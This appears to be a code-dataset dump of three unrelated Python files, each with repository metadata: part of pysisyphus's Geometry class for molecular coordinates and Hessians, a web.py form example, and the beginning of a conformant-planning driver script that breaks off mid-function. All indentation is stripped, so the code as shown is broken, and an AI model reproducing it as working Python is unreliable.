#
# Here we update the Cartesians of the internal coordinate object to the new
# values and calculate new internal coordinates, from which we can derive a step
# in internals.
if cartesian:
self.assert_cart_coords(coords)
cart_coords = coords.copy()
# Update Cartesians of internal coordinate object and calculate
# new internals.
self.internal.coords3d = coords
# Determine new internal coordinates, so we can later calculate a
# step in internal coordinates.
coords = self.internal.coords
# Finally we also update the Cartesian coordinates of the Geometry object,
# so the subsequent sanity check does not fail. This also allows updating
# the coordiantes of atoms that are frozen. We set Geometry._coords directly,
# instead of Geometry.cart_coords or Geometry.coords3d, to avoid an infinite
# recursion.
self._coords = cart_coords
# Sanity check, asserting that the cartesian coordinates of the
# Geometry object and the internal coordinate object are the same.
np.testing.assert_allclose(self.coords3d, self.internal.coords3d)
try:
int_step = coords - self.internal.coords
cart_step = self.internal.transform_int_step(
int_step, update_constraints=update_constraints
)
# From now on coords will always hold Cartesian coordinates!
coords = self._coords + cart_step
except NeedNewInternalsException as exception:
invalid_inds = exception.invalid_inds
valid_typed_prims = [
typed_prim
for i, typed_prim in enumerate(self.internal.typed_prims)
if i not in invalid_inds
]
coords3d = exception.coords3d.copy()
coord_class = self.coord_types[self.coord_type]
self.internal = coord_class(
# Instead of using only the remaining, valid typed_prims
# we could look for an entirely new set of typed_prims.
#
# But when we do this and we end up with more coordinates
# than before, this will lead to problems with the HDF5 dump.
# No problems arise when fewer coordinates are used
# (valid_typed_prims <= self.internal.typed_prims).
self.atoms,
coords3d,
typed_prims=valid_typed_prims,
)
self._coords = coords3d.flatten()
raise RebuiltInternalsException(
typed_prims=self.internal.typed_prims.copy()
)
# Restore original coordinates of frozen atoms. Right now this should
# be redundant, as the Cartesian step is also constrainted in the
# Internal->Cartesian backtransformation. But we keep it for now.
coords.reshape(-1, 3)[self.freeze_atoms] = self.coords3d[self.freeze_atoms]
# Set new Cartesian coordinates
self._coords = coords
# Reset all values because no calculations with the new coords
# have been performed yet.
self.clear()
def reset_coords(self, new_typed_prims):
if self.coord_type == "cart":
return
coord_class = self.coord_types[self.coord_type]
self.internal = coord_class(
self.atoms, self.coords3d, typed_prims=new_typed_prims
)
@coords.setter
def coords(self, coords):
"""Wrapper for saving coordinates internally.
Parameters
----------
coords : np.array
1d array containing atomic coordiantes. It's length
depends on the coordinate system.
"""
self.set_coords(coords)
@property
def coords3d(self):
"""Coordinates in 3d.
Returns
-------
coords3d : np.array
Coordinates of the Geometry as 2D array.
"""
return self._coords.reshape(-1, 3)
@coords3d.setter
def coords3d(self, coords3d):
self.set_coords(coords3d, cartesian=True)
@property
def cart_coords(self):
return self._coords
@cart_coords.setter
def cart_coords(self, coords):
self.set_coords(coords, cartesian=True)
@property
def coords_by_type(self):
"""Coordinates in 3d by atom type and their corresponding indices.
Returns
-------
cbt : dict
Dictionary with the unique atom types of the Geometry as keys.
It's values are the 3d coordinates of the corresponding atom type.
inds : dict
Dictionary with the unique atom types of the Geometry as keys.
It's values are the original indices of the 3d coordinates in the
whole coords3d array.
"""
cbt = dict()
inds = dict()
# for i, (atom, c3d) in enumerate(zip(self.atoms, self.coords3d)):
# cbt.setdefault(atom, list()).append((i, c3d.tolist()))
for i, (atom, c3d) in enumerate(zip(self.atoms, self.coords3d)):
cbt.setdefault(atom, list()).append((c3d))
inds.setdefault(atom, list()).append(i)
for atom, c3d in cbt.items():
cbt[atom] = np.array(c3d)
inds[atom] = np.array(inds[atom])
return cbt, inds
@property
def comment(self):
en_width = 20
# Check if we have to drop an (old) energy entry
try:
_ = float(self._comment[:en_width])
# Drop old energy entry
self._comment = self._comment[en_width + 2 :]
except (ValueError, IndexError):
pass
# Prepend (new) energy, if present
if self._energy:
en_str = f"{self._energy: >{en_width}.8f} , "
else:
en_str = ""
return f"{en_str}{self._comment}"
@comment.setter
def comment(self, new_comment):
self._comment = new_comment
@property
def masses(self):
if self._masses is None:
masses = np.array([MASS_DICT[atom.lower()] for atom in self.atoms])
for atom_index, iso_mass in self.isotopes:
if "." not in str(iso_mass):
atom = self.atoms[atom_index].lower()
key = (atom, iso_mass)
try:
iso_mass = ISOTOPE_DICT[key]
except KeyError as err:
print(
f"Found no suitable mass for '{atom.capitalize()}' with approx. "
f"mass of ~{iso_mass} au!"
)
raise err
masses[atom_index] = float(iso_mass)
self.masses = masses
return self._masses
@masses.setter
def masses(self, masses):
assert len(masses) == len(self.atoms)
self._masses = np.array(masses, dtype=float)
@property
def masses_rep(self):
# Some of the analytical potentials are only 2D
repeat_masses = 2 if (self._coords.size == 2) else 3
return np.repeat(self.masses, repeat_masses)
@property
def total_mass(self):
return sum(self.masses)
def center_of_mass_at(self, coords3d):
"""Returns the center of mass at given coords3d.
Parameters
----------
coords3d : np.array, shape(N, 3)
Cartesian coordiantes.
Returns
-------
R : np.array, shape(3, )
Center of mass.
"""
return 1 / self.total_mass * np.sum(coords3d * self.masses[:, None], axis=0)
@property
def center_of_mass(self):
"""Returns the center of mass.
Returns
-------
R : np.array, shape(3, )
Center of mass.
"""
return self.center_of_mass_at(self.coords3d)
@property
def centroid(self):
"""Geometric center of the Geometry.
Returns
-------
R : np.array, shape(3, )
Geometric center of the Geometry.
"""
return self.coords3d.mean(axis=0)
def center(self):
self.coords3d -= self.centroid[None, :]
@property
def mw_coords(self):
"""Mass-weighted coordinates.
Returns
-------
mw_coords : np.array
1d array containing the mass-weighted cartesian coordiantes.
"""
return np.sqrt(self.masses_rep) * self._coords
@mw_coords.setter
def mw_coords(self, mw_coords):
"""Set mass-weighted coordinates."""
self.coords = mw_coords / np.sqrt(self.masses_rep)
def fd_coords3d_gen(self, step_size=1e-3):
"""Iterator returning 3d Cartesians for finite-differences."""
coords3d = self.coords3d.copy()
zeros = np.zeros_like(coords3d)
for i, _ in enumerate(self.coords3d):
for j in (0, 1, 2):
step = zeros.copy()
step[i, j] = step_size
yield i, j, coords3d + step, coords3d - step
@property
def covalent_radii(self):
return np.array([CR[a.lower()] for a in self.atoms])
@property
def inertia_tensor(self):
return inertia_tensor(self.coords3d, self.masses)
def principal_axes_are_aligned(self):
"""Check if the principal axes are aligned with the cartesian axes.
Returns
-------
aligned : bool
Wether the principal axes are aligned or not.
"""
w, v = np.linalg.eigh(self.inertia_tensor)
return np.allclose(v, np.eye(3)), v
def align_principal_axes(self):
"""Align the principal axes to the cartesian axes.
https://math.stackexchange.com/questions/145023
"""
I = self.inertia_tensor
w, v = np.linalg.eigh(I)
# rot = np.linalg.solve(v, np.eye(3))
# self.coords3d = rot.dot(self.coords3d.T).T
self.coords3d = v.T.dot(self.coords3d.T).T
def standard_orientation(self):
# Translate center of mass to cartesian origin
self.coords3d -= self.center_of_mass
# Try to rotate the principal axes onto the cartesian axes
for i in range(5):
self.align_principal_axes()
aligned, vecs = self.principal_axes_are_aligned()
if aligned:
break
def reparametrize(self):
try:
# TODO: allow skipping the update
results = self.calculator.get_coords(self.atoms, self.cart_coords)
self.set_coords(results["coords"], cartesian=True)
reparametrized = True
except AttributeError:
reparametrized = False
return reparametrized
@property
def energy(self):
"""Energy of the current atomic configuration.
Returns
-------
energy : float
Energy of the current atomic configuration.
"""
if self._energy is None:
results = self.calculator.get_energy(self.atoms, self._coords)
self.set_results(results)
return self._energy
@energy.setter
def energy(self, energy):
"""Internal wrapper for setting the energy.
Parameters
----------
energy : float
"""
self._energy = energy
@property
def cart_forces(self):
if self._forces is None:
results = self.calculator.get_forces(self.atoms, self._coords)
self.set_results(results)
return self._forces
@cart_forces.setter
def cart_forces(self, cart_forces):
cart_forces = np.array(cart_forces)
assert cart_forces.shape == self.cart_coords.shape
self._forces = cart_forces
@property
def forces(self):
"""Energy of the current atomic configuration.
Returns
-------
force : np.array
1d array containing the forces acting on the atoms. Negative
of the gradient.
"""
forces = self.cart_forces
if self.internal:
forces = self.internal.transform_forces(forces)
return forces
@forces.setter
def forces(self, forces):
"""Internal wrapper for setting the forces.
Parameters
----------
forces : np.array
"""
forces = np.array(forces)
assert forces.shape == self.cart_coords.shape
self._forces = forces
@property
def cart_gradient(self):
return -self.cart_forces
@cart_gradient.setter
def cart_gradient(self, cart_gradient):
self.cart_forces = -cart_gradient
@property
def gradient(self):
"""Negative of the force.
Returns
-------
gradient : np.array
1d array containing the negative of the current forces.
"""
return -self.forces
# @gradient.setter
# def gradient(self, gradient):
# """Internal wrapper for setting the gradient."""
# # No check here as this is handled by in the forces.setter.
# self.forces = -gradient
@property
def mw_gradient(self):
"""Mass-weighted gradient.
Returns
-------
mw_gradient : np.array
Returns the mass-weighted gradient.
"""
return -self.forces / np.sqrt(self.masses_rep)
@property
def cart_hessian(self):
if self._hessian is None:
results = self.calculator.get_hessian(self.atoms, self._coords)
self.set_results(results)
return self._hessian
@cart_hessian.setter
def cart_hessian(self, cart_hessian):
if cart_hessian is not None:
cart_hessian = np.array(cart_hessian)
assert cart_hessian.shape == (self.cart_coords.size, self.cart_coords.size)
self._hessian = cart_hessian
@property
def hessian(self):
"""Matrix of second derivatives of the energy in respect to atomic
displacements.
Returns
-------
hessian : np.array
2d array containing the second derivatives of the energy with respect
to atomic/coordinate displacements depending on the type of
coordiante system.
"""
hessian = self.cart_hessian
if self.internal:
int_gradient = self.gradient
return self.internal.transform_hessian(hessian, int_gradient)
return hessian
# @hessian.setter
# def hessian(self, hessian):
# """Internal wrapper for setting the hessian."""
# assert hessian.shape == (self.coords.size, self.coords.size)
# self._hessian = hessian
def mass_weigh_hessian(self, hessian):
return self.mm_sqrt_inv.dot(hessian).dot(self.mm_sqrt_inv)
@property
def mw_hessian(self):
"""Mass-weighted hessian.
Returns
-------
mw_hessian : np.array
2d array containing the mass-weighted hessian M^(-1/2) H M^(-1/2).
"""
# M^(-1/2) H M^(-1/2)
# TODO: Do the right thing here when the hessian is not yet calculated.
# this would probably involve figuring out how to mass-weigh and
# internal coordinat hessian... I think this is described in one
# of the Gonzalez-Schlegel-papers about the GS2 algorithm.
return self.mass_weigh_hessian(self.cart_hessian)
def unweight_mw_hessian(self, mw_hessian):
"""Unweight a mass-weighted hessian.
Parameters
----------
mw_hessian : np.array
Mass-weighted hessian to be unweighted.
Returns
-------
hessian : np.array
2d array containing the hessian.
"""
mm_sqrt = np.diag(self.masses_rep ** 0.5)
return mm_sqrt.dot(mw_hessian).dot(mm_sqrt)
def set_h5_hessian(self, fn):
with h5py.File(fn, "r") as handle:
atoms = handle.attrs["atoms"]
hessian = handle["hessian"][:]
# Also check lengths, as zip would lead to trunction for
# different lenghts of self.atoms and atoms.
valid = (len(atoms) == len(self.atoms)) and all(
[ga.lower() == a.lower() for ga, a in zip(self.atoms, atoms)]
)
if valid:
self.cart_hessian = hessian
def get_normal_modes(self, cart_hessian=None, full=False):
"""Normal mode wavenumbers, eigenvalues and Cartesian displacements Hessian."""
if cart_hessian is None:
cart_hessian = self.cart_hessian
mw_hessian = self.mass_weigh_hessian(cart_hessian)
proj_hessian, P = self.eckart_projection(mw_hessian, return_P=True, full=full)
eigvals, eigvecs = np.linalg.eigh(proj_hessian)
mw_cart_displs = P.T.dot(eigvecs)
cart_displs = self.mm_sqrt_inv.dot(mw_cart_displs)
cart_displs /= np.linalg.norm(cart_displs, axis=0)
nus = eigval_to_wavenumber(eigvals)
return nus, eigvals, mw_cart_displs, cart_displs
def get_imag_frequencies(self, hessian=None, thresh=1e-6):
vibfreqs, eigvals, *_ = self.get_normal_modes(hessian)
return vibfreqs[eigvals < thresh]
def get_thermoanalysis(
self, energy=None, cart_hessian=None, T=T_DEFAULT, p=p_DEFAULT, point_group="c1"
):
if cart_hessian is None:
cart_hessian = self.cart_hessian
# Delte any supplied energy value when a Hessian calculation is carried out
energy = None
if energy is None:
energy = self.energy
vibfreqs, *_ = self.get_normal_modes(cart_hessian)
try:
mult = self.calculator.mult
except AttributeError:
mult = 1
logger.debug(
"Multiplicity for electronic entropy could not be determined! "
f"Using 2S+1 = {mult}."
)
thermo_dict = {
"masses": self.masses,
"vibfreqs": vibfreqs,
"coords3d": self.coords3d,
"energy": energy,
"mult": mult,
}
qcd = QCData(thermo_dict, point_group=point_group)
thermo = thermochemistry(
qcd, temperature=T, pressure=p, invert_imags=-15.0, cutoff=25.0
)
return thermo
def get_trans_rot_projector(self, full=False):
return get_trans_rot_projector(self.cart_coords, masses=self.masses, full=full)
def eckart_projection(self, mw_hessian, return_P=False, full=False):
P = self.get_trans_rot_projector(full=full)
proj_hessian = P.dot(mw_hessian).dot(P.T)
if return_P:
return proj_hessian, P
else:
return proj_hessian
def calc_energy_and_forces(self):
"""Force a calculation of the current energy and forces."""
results = self.calculator.get_forces(self.atoms, self.cart_coords)
self.set_results(results)
def assert_cart_coords(self, coords):
assert coords.size == self.cart_coords.size, (
"This method only works with cartesian coordinate input. "
"Did you accidentally provide internal coordinates?"
)
def get_temporary_coords(self, coords):
if self.coord_type != "cart":
int_step = coords - self.internal.coords
cart_step = self.internal.transform_int_step(int_step, pure=True)
coords = self.cart_coords + cart_step
self.assert_cart_coords(coords)
return coords
def get_energy_at(self, coords):
coords = self.get_temporary_coords(coords)
return self.calculator.get_energy(self.atoms, coords)["energy"]
def get_energy_at_cart_coords(self, cart_coords):
self.assert_cart_coords(cart_coords)
return self.calculator.get_energy(self.atoms, cart_coords)["energy"]
def get_energy_and_forces_at(self, coords):
"""Calculate forces and energies at the given coordinates.
The results are not saved in the Geometry object."""
coords = self.get_temporary_coords(coords)
results = self.calculator.get_forces(self.atoms, coords)
self.zero_frozen_forces(results["forces"])
if self.coord_type != "cart":
results["forces"] = self.internal.transform_forces(results["forces"])
return results
def get_energy_and_cart_forces_at(self, cart_coords):
self.assert_cart_coords(cart_coords)
results = self.calculator.get_forces(self.atoms, cart_coords)
self.zero_frozen_forces(results["forces"])
return results
def get_energy_and_cart_hessian_at(self, cart_coords):
self.assert_cart_coords(cart_coords)
results = self.calculator.get_hessian(self.atoms, cart_coords)
return results
def calc_double_ao_overlap(self, geom2):
return self.calculator.run_double_mol_calculation(
self.atoms, self.coords, geom2.coords
)
def zero_frozen_forces(self, cart_forces):
cart_forces.reshape(-1, 3)[self.freeze_atoms] = 0.0
def clear(self):
"""Reset the object state."""
self._energy = None
self._forces = None
self._hessian = None
self.true_forces = None
self.true_energy = None
self.all_energies = None
def set_results(self, results):
"""Save the results from a dictionary.
Parameters
----------
results : dict
The keys in this dict will be set as attributes in the current
object, with the corresponding item as value.
"""
trans = {
"energy": "energy",
"forces": "cart_forces",
"hessian": "cart_hessian",
# True properties in AFIR calculations
"true_forces": "true_forces",
"true_energy": "true_energy",
# Overlap calculator; includes excited states
"all_energies": "all_energies",
}
for key in results:
# Zero forces of frozen atoms
if key == "forces":
self.zero_frozen_forces(results[key])
setattr(self, trans[key], results[key])
self.results = results
def as_xyz(self, comment="", cart_coords=None):
"""Current geometry as a string in XYZ-format.
Parameters
----------
comment : str, optional
Will be written in the second line (comment line) of the
XYZ-string.
cart_coords : np.array, 1d, shape (3 * atoms.size, )
Cartesians for dumping instead of self._coords.
Returns
-------
xyz_str : str
Current geometry as string in XYZ-format.
"""
if cart_coords is None:
cart_coords = self._coords
cart_coords = cart_coords.copy()
cart_coords *= BOHR2ANG
if comment == "":
comment = self.comment
return make_xyz_str(self.atoms, cart_coords.reshape((-1, 3)), comment)
def dump_xyz(self, fn):
if not fn.lower().endswith(".xyz"):
fn = fn + ".xyz"
with open(fn, "w") as handle:
handle.write(self.as_xyz())
def get_subgeom(self, indices, coord_type="cart", sort=False):
"""Return a Geometry containing a subset of the current Geometry.
Parameters
----------
indices : iterable of ints
Atomic indices that the define the subset of the current Geometry.
coord_type : str, ("cart", "redund"), optional
Coordinate system of the new Geometry.
Returns
-------
sub_geom : Geometry
Subset of the current Geometry.
"""
if sort:
indices = sorted(indices)
ind_list = list(indices)
sub_atoms = [self.atoms[i] for i in ind_list]
sub_coords = self.coords3d[ind_list]
sub_geom = Geometry(sub_atoms, sub_coords.flatten(), coord_type=coord_type)
return sub_geom
def get_subgeom_without(self, indices, **kwargs):
with_indices = [ind for ind, _ in enumerate(self.atoms) if ind not in indices]
return self.get_subgeom(with_indices, **kwargs)
def rmsd(self, geom):
return rmsd.kabsch_rmsd(
self.coords3d - self.centroid, geom.coords3d - geom.centroid
)
def as_g98_list(self):
"""Returns data for fake Gaussian98 standard orientation output.
Returns
-------
g98_list : list
List with one row per atom. Every row contains [center number,
atomic number, atomic type (always 0 for now), X Y Z coordinates
in Angstrom.
"""
Atom = namedtuple("Atom", "center_num atom_num atom_type x y z")
atoms = list()
for i, (a, c) in enumerate(zip(self.atoms, self.coords3d), 1):
x, y, z = c * BOHR2ANG
atom = Atom(i, ATOMIC_NUMBERS[a.lower()], 0, x, y, z)
atoms.append(atom)
return atoms
def jmol(self, cart_coords=None):
"""Show geometry in jmol."""
tmp_xyz = tempfile.NamedTemporaryFile(suffix=".xyz")
tmp_xyz.write(self.as_xyz(cart_coords=cart_coords).encode("utf-8"))
tmp_xyz.flush()
jmol_cmd = "jmol"
try:
subprocess.run([jmol_cmd, tmp_xyz.name])
except FileNotFoundError:
print(f"'{jmol_cmd}' seems not to be on your path!")
tmp_xyz.close()
def as_ase_atoms(self):
try:
import ase
except ImportError:
print("Please install the 'ase' package!")
return None
# ASE coordinates are in Angstrom
atoms = ase.Atoms(symbols=self.atoms, positions=self.coords3d * BOHR2ANG)
if self.calculator is not None:
from pysisyphus.calculators import FakeASE
ase_calc = FakeASE(self.calculator)
atoms.set_calculator(ase_calc)
return atoms
def get_restart_info(self):
# Geometry restart information
restart_info = {
"atoms": self.atoms,
"cart_coords": self.cart_coords.tolist(),
"coord_type": self.coord_type,
"comment": self.comment,
}
try:
typed_prims = self.internal.typed_prims
except AttributeError:
typed_prims = None
restart_info["typed_prims"] = typed_prims
# Calculator restart information
try:
calc_restart_info = self.calculator.get_restart_info()
except AttributeError:
calc_restart_info = dict()
restart_info["calc_info"] = calc_restart_info
return restart_info
def set_restart_info(self, restart_info):
assert self.atoms == restart_info["atoms"]
self.cart_coords = np.array(restart_info["cart_coords"], dtype=float)
try:
self.calculator.set_restart_info(restart_info["calc_info"])
except KeyError:
print("No calculator restart information found!")
except AttributeError:
print("Could not restart calculator, as no calculator is set!")
def get_sphere_radius(self, offset=4):
distances = pdist(self.coords3d)
radius = (distances.max() / 2) + offset
return radius
def without_hydrogens(self):
atoms_no_h, coords3d_no_h = zip(
*[
(atom, coords)
for atom, coords in zip(self.atoms, self.coords3d)
if atom.lower() != "h"
]
)
return Geometry(atoms_no_h, np.array(coords3d_no_h).flatten())
def describe(self):
return f"Geometry({self.sum_formula}, {len(self.atoms)} atoms)"
def approximate_radius(self):
"""Approximate molecule radius from the biggest atom distance along an axis."""
coords3d = self.coords3d - self.centroid[None, :]
mins = coords3d.min(axis=0)
maxs = coords3d.max(axis=0)
dists = maxs - mins
max_dist = dists.max()
return max_dist
def rotate(self, copy=False):
if copy:
geom = self.copy()
else:
geom = self
rot = Rotation.random()
geom.coords3d = rot.apply(geom.coords3d)
return geom
@property
def bond_sets(self, bond_factor=BOND_FACTOR):
bonds = find_bonds(
self.atoms, self.coords3d, self.covalent_radii, bond_factor=bond_factor
)
bond_sets = set([frozenset(b) for b in bonds])
return bond_sets
def __str__(self):
name = ""
if self.name:
name = f"{self.name}, "
return f"Geometry({name}{self.sum_formula})"
def __repr__(self):
return self.__str__()
|
eljost/pysisyphus
|
pysisyphus/Geometry.py
|
Python
|
gpl-3.0
| 45,861
|
[
"ASE",
"Jmol"
] |
9b62562645acf0a652defaf9b62c174b40b132a8a8a36a16b1f569956fd1fb5c
|
import web
from web import form
render = web.template.render('templates/')
urls = ('/', 'index')
app = web.application(urls, globals())
myform = form.Form(
form.Textbox("boe"),
form.Textbox("bax",
form.notnull,
form.regexp('\d+', 'Must be a digit'),
form.Validator('Must be more than 5', lambda x:int(x)>5)),
form.Textarea('moe'),
form.Checkbox('curly'),
form.Dropdown('french', ['mustard', 'fries', 'wine']))
class index:
def GET(self):
form = myform()
# make sure you create a copy of the form by calling it (line above)
# Otherwise changes will appear globally
return render.formtest(form)
def POST(self):
form = myform()
if not form.validates():
return render.formtest(form)
else:
# form.d.boe and form['boe'].value are equivalent ways of
# extracting the validated arguments from the form.
return "Grrreat success! boe: %s, bax: %s" % (form.d.boe, form['bax'].value)
if __name__=="__main__":
web.internalerror = web.debugerror
app.run()
|
ivanortegaalba/DAI_2014-2015
|
practica-webpy/form-exercise5.py
|
Python
|
gpl-2.0
| 1,112
|
[
"MOE"
] |
a3730d96b0bd95eaac84cebc8a215fb4799693763d18a905d1c2899b994cd46e
|
#! /usr/bin/env python2.5
# -*- coding: latin-1 -*-
# Copyright (C) 2006-2008 Universitat Pompeu Fabra
# Copyright (C) 2009 Universidad Simon Bolivar
#
# Permission is hereby granted to distribute this software for
# non-commercial research purposes, provided that this copyright
# notice is included with any such distribution.
#
# THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
# SOFTWARE IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU
# ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
#
# Elaborated by Hector Palacios, hlp@ldc.usb.ve, hectorpal@gmail.com
# Joint work with Hector Geffner.
# call it with the following bash enviroment:
# TRANSLATOR_HOME=<directory>
# ulimit -S -s 1024000 (very high stack size)
# ulimit -S -v MEMORYLIMIT_in_kb
import sys, os, signal, sets, errno
import re, datetime, subprocess, time, resource
import math
import shutil
import timeout, lug, shutil
import nondet2conf
import pddlsfromtar
init_wall_clock = time.time()
def usage():
print """
TRANSLATOR: a family of translation-based planners for Conformant problems.
Includes t0, based on classical planning.
usage: %s {option}* (<domain.pddl> <problem.pddl> | <bothFiles.{tar|tgz|tbz}>)
general options:
-l log prefix. Log files: <prefix>_<problem>.{log,stat,ipc5,time}.
Prefix default = translator_<strategy>
-f force to overwrite previous log file, defaut = no
-t global time limit. Overide strategies
-c check plan, default = no
-d leave generated files for debug, default = no
-v l verbosity. default = %d, values = 0, 10, 20, 30
-s <strategy>
if a tar-file (ending in .tar, .tgz or .tbz) is used,
it should contain only two files: the domain and the problem.
<strategy> is an expression as follows.
strategy ::= abbrevation:time{; strategy} | abbrevation:time
abbrevation ::= t0 | only-t0 | k1 | only-k1
| s0 | fs0 | k0 | t0c | old-t0
| sat | mc | satplan
time ::= <int=time in seconds> | inf
(protect strategies from the shell by '' or "")
Strategies are useful for combining different translations
approach. For example: sat + classical.
For reasons of efficiency, classical translations
are themself strategies, as it avoid repeated parsing.
The default strategy is '%s'
Example: 'only-t0:inf; sat:inf'
ABBREVATIONS:
====== Translations fo Classical Planning ======
Look for a conformant plan by transforming the problem into a classical one.
See Palacios & Geffner papers (ICAPS 2007 and JAIR 2009) for more details.
Most of the configurations try a series of classical problems
with FF classical planner (by default).
If an instance is unsolvable, next classical is tried.
==> t0
1st: If width = 1, K1 with uniq merge = satisfying clase,
else K1 with merges = all clauses
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> only-t0
If width = 1, K1 with uniq merge = satisfying clase,
else K1 with merges = all clauses.
INCOMPLETE, polynomic.
==> k1
1st: K1 with merges = all clauses
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> only-t0
K1 with merges = all clauses.
INCOMPLETE, polynomic.
==> s0
Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> s0
Ktm with merge for each L, models of Initial situation.
COMPLETE, always exponential.
==> k0
No merges.
INCOMPLETE, polynomic.
==> t0c
like t0, but verify "consistency" of conformant problem.
==> old-t0
Used in IPC5 and IPC6
1st: If width = 1, K1 with uniq merge = satisfying clase
2nd: Ktm with merge for each L, models of clauses relevant to L: C_I(L)
COMPLETE, sometimes polynomic.
==> kp (DISABLED)
AAAI-06 version. Not reimplemented yet.
For further options of translations to classical,
run ./cf2cs
To add a new option when calling cf2cs add '-trans -newoption'
while calling translator.
====== Logic-based Translations ======
Translate conformant problem into a CNF (a la SATPLAN)
==> sat
Look for an OPTIMAL conformant plan until a final horizon.
by transforming the problem to a SAT theory for each horizon
(As published in CAEPIA 2005, Palacios and Geffner, LNCS)
additional options for mc and sat:
-i n init horizon. default = %d
-e n final horizon. default = %d
-z look for serial plans instead of parallel. default = false.
-enum-s0 print all the possible initial states and exit.
-qbf create a .qdimacs for the qbf corresponding to the starting
horizon and finish. Use in combination with -i
==> mc
Look for an OPTIMAL conformant plan until a final horizon.
by transforming the problem to d-DNNF and doing MC on each node.
(As published in ICAPS 2005 Palacios, Bonet, Darwiche and Geffner)
addtional options for mc:
-nsim no simple prunning
-nstr no strong prunning
-lik most likely instead of select var/value by criticality (Huang ICAPS 2006)
Algorithm "mc" also works with probabilistic version.
On this case, for the init horizon (-i)
a plan with Maximal probability of success is reported.
==> satplan
A naive SATPLAN for classical planning.
addtional options:
-nsol N return N solutions to the problem. Useful for learning.
--------------------------------------------
In some cases is better to increase the stack size:
ulimit -S -s 1024000
and to limit the memory limit.
ulimit -S -v MEMORYLIMIT_IN_KB
All tools are find in $%s directory
This planner uses 'ff' as classical planner, 'siege_v4' and 'zChaff' as SAT solvers,
'relsat' as a model enumerator, 'verify' for verifying conformant plans,
'validate' for validating classical plans, 'c2d_220' for compiling into d-DNNF
or simplifying CNF theories.
Rights are registered by their respective owners.
Contact Hector Palacios for further information,
or visit http://www.ldc.usb.ve/~hlp
""" % (sys.argv[0], verbosity, sstrategy, init_horiz, end_horiz, Loc_v)
sys.exit(1)
def get_user_time(str):
""" For getting seconds from user field of time().
For example: 'user 1m3.183s'
"""
res = str
for it2 in str.split(' '):
if 'user' in it2:
for it in it2.split():
if 'm' in it:
[m,s] = it.split('m')
s = s.split('s')[0]
else:
m = '0'
s = it.split('u')[0]
try:
res = float(m)*60+float(s)
except:
pass
return res
def weak_unlink(f):
try:
os.unlink(f)
except:
return
def gen_log(msg, lst = [], time = True, date = False):
msg2=msg + ' '
if(time and not date ):
msg2 += 'at ' + datetime.datetime.now().strftime('%H:%M:%S')
elif( date ):
msg2 += 'at ' + datetime.datetime.now().ctime()
line = ''
if(lst != []):
line = '\ncommand: '
for i in lst:
line += i + ' '
return msg2+line
def pr(msg):
print msg
log_f.write(msg+'\n')
log_f.flush()
def log(msg):
log_f.write(msg+'\n')
log_f.flush()
# Extrating from result of wait
def the_signal(result):
return result & 127
def was_core(result):
return (result & 128)==1
def exit_status(result):
return result >> 8
tokill=[]
def clean_children():
for pid in tokill:
try:
os.kill(pid,15)
except OSError, e:
if e.errno == errno.ESRCH:
continue
time.sleep(0.5)
while 1:
try:
pid,res = os.waitpid(0, os.WNOHANG)
if(pid==0):
break
else:
print 'additional process found %d' % pid
os.kill(pid,15)
except OSError, e:
if e.errno == errno.ESRCH:
continue
elif e.errno == errno.ECHILD:
break
else:
raise
#print 'Collecting zombies...'
time.sleep(0.5)
while 1:
try:
pid,result = os.wait()
signal = the_signal(result)
core = was_core(result)
status=exit_status(result)
print '\tfinished pid =', pid, 'signal =', signal, 'core =', core, 'status =', status
except OSError, e:
if e.errno == errno.ESRCH:
continue
elif e.errno == errno.ECHILD:
break
else:
raise
def killall(signum, frame):
global cleaning_functions
if(signum==14):
print 'Timeout... trying to kill pending children'
else:
print 'Interrupted... trying to kill pending children'
print 'collecting zombies... done'
clean_children()
print 'cleaning files... done'
for x in cleaning_functions:
f = x[0]
arg = x[1]
f(arg)
finish()
stat_f.write('TIMEOUT\n')
sys.exit(1)
def calc_num_s0s(init_nf):
cmd=[Loc+'/relsat','-#c',init_nf]
log(gen_log('--------- Calling',cmd))
relsat=subprocess.Popen(cmd,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
num_s0 = -1
for l in relsat.stdout.readlines():
if(l.startswith('Number of solutions')):
num_s0 = int(l.split(' ')[3])
if(num_s0 <= 0):
pr('Error on response of relsat -#c')
sys.exit(1)
res = relsat.wait()
tokill.pop()
if(res < 0):
pr('Error calling relsat -#c: %d ' % res)
sys.exit(1)
return num_s0
atom2time = {}
def calc_atom2fluent(atoms_nf):
atom2fluent = {}
atoms_f=open(atoms_nf,'r')
for line in atoms_f.readlines():
if(line.find(':')> 0):
pair=line.split(':')
fluent=pair[1][0:-1].split('*')[0]
v_atom=pair[0].split(' ')[0]
t=pair[0].split(' ')[2]
atom=v_atom[1:len(v_atom)]
atom2fluent[atom] = fluent
atom2time[atom] = t
atoms_f.close()
return atom2fluent
def is_really_consistent(n_atoms_init, num_s0s, actions_nf, nnf_nf):
cmd=[Loc+'/plannf','-f',str(n_atoms_init),str(num_s0s),actions_nf,nnf_nf]
log(gen_log('--------- Calling', cmd))
# When the nnf is just false or true, plannf violate an assertion
# the problem is not consistent anyway, so we redirect errors to /dev/null
devnull=open(os.devnull,'w')
plannf=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=devnull )
tokill.append(plannf.pid)
answ = False
for l in plannf.stdout.readlines():
if(l.startswith('RESULT')):
answ = l.split(':')[1].strip()
res = plannf.wait()
tokill.pop()
if(res < 0):
pr('Error calling plannf: %d ' % res)
sys.exit(1)
res = ""
devnull.close()
if(answ=='yes'):
return True
else:
return False
def is_consistent(n_atoms_init,init_nf,cnf_nf):
cnfs0_nf=init_nf+'.s0'
erase.add(cnfs0_nf)
cmd=[Loc+'/relsat',init_nf] # If we add -#a, check every solution
relsat=subprocess.Popen(cmd,bufsize=-1, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
